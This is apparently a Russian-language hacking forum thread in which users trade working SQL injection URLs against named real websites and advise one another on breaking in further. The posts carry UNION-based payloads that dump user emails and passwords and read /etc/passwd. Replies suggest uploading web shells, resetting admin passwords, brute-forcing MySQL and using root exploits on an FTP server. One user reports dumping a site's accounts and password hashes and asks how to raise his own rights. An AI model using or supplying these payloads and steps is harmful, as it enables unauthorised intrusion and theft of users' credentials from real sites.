Code: http://www.meraevents.com/Service_provider_detail.php?spid=(1409)and(1=0)union(select(1),2,(select(@x)from(select(@x:=0x00),(select(0)from(user)where(0x00)in(@x:=concat(@x,0x3c62723e,Email,0x3a,Password))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)--+
Только на карусели такое раскручивается =\ А где ты тут уязвимость увидели? Ты дал просто путь к скрипту и что дальше?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND b.name not like '%test%' ORDER BY a.subscription_date ASC' at line 1
Эм... Ошибка в самом запросе локально, в ней никаких передаваемых параметров удаленно. Как ты представляешь, такое можно проэкспуатировать? Ну просто логически подумав можно же понять, что никак. Поимев сорцы можно посмотреть что и как там происходит и возможно получить полноценный SQLi, но так это скорее всего просто локальная ошибка независимая от внешних параметров. Вот если бы ошибка SQL вылезала при манипуляции с хидерами (Referer, User-Agent) или же GET \ POST \ COOKIE параметрами то да, это была бы скорее всего SQLi, а так... =\
Code: http://www.horolive.com/psychic-profile.php?id=-3254+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8+from+user--+
есть хост справами роот, через пхп админ могу заливать файлы, но почемуто при заходе на сам файл, он не отоброжается в браузере, а через load_file('') говорит что он есть сервак стоит на винде...
@@version_compile_os=Win32 @@version=5.0.18-nt есть точный путь до корневого католога сайта, .htaccess не мешает, пхп выполняется, а мой не хочет, даже элементарный phpinfo();
знач мускул на винде, там какой сервак, апач/iis или что? если апач то попробуй узнать ос по баннерам вобщем если ты рут и есть PMA, то ищи там в базах всякие cms ки или форумы, меняй пасс админа, или добавь нового, и залей шелл быстрый и эффективный метод
http://opi8.com/vision/?id=-33+UNION+SELECT+1,group_concat(0x0b,table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=0x616d656c69615f74657374 +--+ НЕ получается вывести таблицы имя базы amelia_test
В ней нет нечего http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,count(*),7,8,9,10+from+information_schema.tables+where+table_schema=0x616d656c69615f74657374+--+ 0
http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+-+ opi8-база omokage@localhos-пользователь Как проверить есть ли у пользователя файловые привелегии?
вернул ноль: Code: http://opi8.com/vision/?id=-33+UNION+SELECT+1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8,9,10--+
на нужном сайте нашёл фтп доступ шарясь по папкам и файлам конфига не нащёл. шелл через браузер не залить вот такой вопрос а можно подключиться к этому же фтп через тотал команд или любой другой фтп софт фтп вероятна без пароля? коль позволяет заходить через браузер и осматриваться не в том направлении мыслю?
Koren зайти можно юзая любой фтп клиент, например filezilla но это аккаунт анонимус, врятли будут права для заливки файлов если серв на *Nix-e, то смотри в сторону рут сплоитов под данную фтпшку
Code: Warning: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) in /home/infosno/public_html/index.php on line 394 « Error » Etomite encountered the following error while attempting to parse the requested resource: « PHP Parse Error » PHP error debug Error: Cannot modify header information - headers already sent by (output started at /home/infosno/public_html/index.php:2157) Error type/ Nr.: Warning - 2 File: /home/infosno/public_html/index.php Line: 394 Line 394 source: header('Content-Type: '.$type.'; charset='.$this->config['etomite_charset']); Parser timing MySQL: 0.0000 s s (0 Requests) PHP: 0.6546 s s Total: 0.6546 s s Можно использовать эту ошибку как уязвимость? если да то можно пример...
Сайт вам сообщает, что не может вывести заголовки, поскольку они уже были выведены. Конечно там может что то есть, но из этой ошибки можно получить только раскрытие путей. Если переменные, преступаемые в header не фильтруются, то вполне возможно получить XSS.
Анализировал сайт через Webcruiser тот обнаружил пару уязвимостей,провел sql атаку и тут выдало всю Бд и Информацию о сервере,слил все аккаунты и хеши с паролями. Мне нужно повысить права доступа на своем аккаунте на том сайте,можно ли как нибуть редактировать БД? Mysql-5 Выглядит уязвимость так Code: _http://wow-hummer.com/account/index.php?modul=static&id=5 Кейворд: Игрового
эм... зайти под админом и повысить свои права;залить шелл, найти конфиг и отредактировать бд; если открыта бд mysql сбрутить пасс, найти пхпмайадмин и опять же повысить свои права З.Ы. какой вопрос такой ответ